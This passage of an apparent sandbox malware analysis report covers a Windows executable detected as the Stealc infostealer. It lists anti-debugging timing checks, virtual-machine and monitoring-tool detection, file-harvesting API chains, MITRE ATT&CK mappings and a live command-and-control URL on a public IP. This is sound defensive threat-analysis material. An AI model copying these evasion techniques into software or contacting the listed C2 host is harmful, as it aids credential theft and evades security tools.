                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DAF5 second address: 69DB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F96F95D6D71h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DB0C second address: 69DB11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DB11 second address: 69DB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DB17 second address: 69DB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F934F1ECh 0x00000009 jmp 00007F96F934F1F9h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0C99 second address: 6A0C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A0C9E second address: 6A0CE3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or dl, 00000000h 0x0000000c adc edx, 2D35E68Fh 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F96F934F1E8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D217Bh], edi 0x00000034 push F871A435h 0x00000039 push esi 0x0000003a push eax 0x0000003b push edx 0x0000003c push esi 0x0000003d pop esi 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A400B second address: 6A401B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F96F95D6D68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A3BF7 second address: 6A3C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1EEh 0x00000007 jmp 00007F96F934F1F7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF050D second address: 4CF0511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0511 second address: 4CF0517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0517 second address: 4CF0534 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edx, eax 0x0000000d mov bx, si 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0534 second address: 4CF0538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0538 second address: 4CF053E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF053E second address: 4CF0544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF060B second address: 4CF066C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F96F95D6D78h 0x00000008 xor ax, DB88h 0x0000000d jmp 00007F96F95D6D6Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F96F95D6D78h 0x0000001b sub esi, 6587BDE8h 0x00000021 jmp 00007F96F95D6D6Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF066C second address: 4CF0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0670 second address: 4CF0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0676 second address: 4CF0697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F96F934F1EDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0697 second address: 4CF06B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, DC42h 0x00000007 mov bx, 7A8Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F96F95D6D70h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF06B9 second address: 4CF06BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF06BF second address: 4CF06E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F96F95D6D6Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF06E2 second address: 4CF06F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96F934F1ECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BCC3A second address: 5BCC40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BCC40 second address: 5BCC46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3FDACA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5B4826 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5B2E14 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5C2FED instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38815
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001240F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0011E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00111710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00111710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0011F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001247C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00123B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00123B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00124B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00124B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0011DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0011EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0011BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0011DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0011DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00111160 GetSystemInfo,ExitProcess,0_2_00111160
                Source: file.exe, file.exe, 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2197299043.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2197299043.0000000000E63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37628
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37631
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37642
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37682
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37647
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37515
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00114610 VirtualProtect ?,00000004,00000100,000000000_2_00114610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00129BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129AA0 mov eax, dword ptr fs:[00000030h]0_2_00129AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00127690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00127690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00129790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00129790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_001298E0
                Source: file.exe, file.exe, 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: LF>Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00157588 cpuid 0_2_00157588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00127D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00127B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00127B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001279E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00127BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00127BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.110000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2154333507.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.110000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2154333507.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6552, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe39%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.php/rfile.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/Pfile.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.php-file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.phpe/file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206file.exe, 00000000.00000002.2197299043.0000000000E1E000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.phpu.file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/6c4adf523b719729.php%.&file.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206/6c4adf523b719729.phpWfile.exe, 00000000.00000002.2197299043.0000000000E78000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.2154333507.0000000004B8B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.215.113.206
                                    		unknownPortugal
                                    		206894WHOLESALECONNECTIONSNLtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1544128
                                    Start date and time:2024-10-28 21:40:08 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 15s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:6
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 80%
                                    • Number of executed functions: 19
                                    • Number of non-executed functions: 132
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: file.exe

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.958933171703137
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:2'181'632 bytes
                                    MD5:37ad51a72ae2ee4f18f90db961ca42e0
                                    SHA1:4e981723fa01e7aa8f81b23c734a13b2cdb9e252
                                    SHA256:33c2bf98bb8da8afa179fd90efc0b686e9eca69ffa2ab5b8163ece46a90ff561
                                    SHA512:83a764e4ff347912c558aaa79d99144ab43d4212fc9275fc14053dcd6c3a5544fb83aeef50fa8b9c85a6eb436346e58d1e436bf2a45d5365ed50a9dc9db96d68
                                    SSDEEP:49152:JbaU4vJCi2C95vOT/gbQcbYa3CSjw0zCGT:wU4vJC25WUUsJPzCG
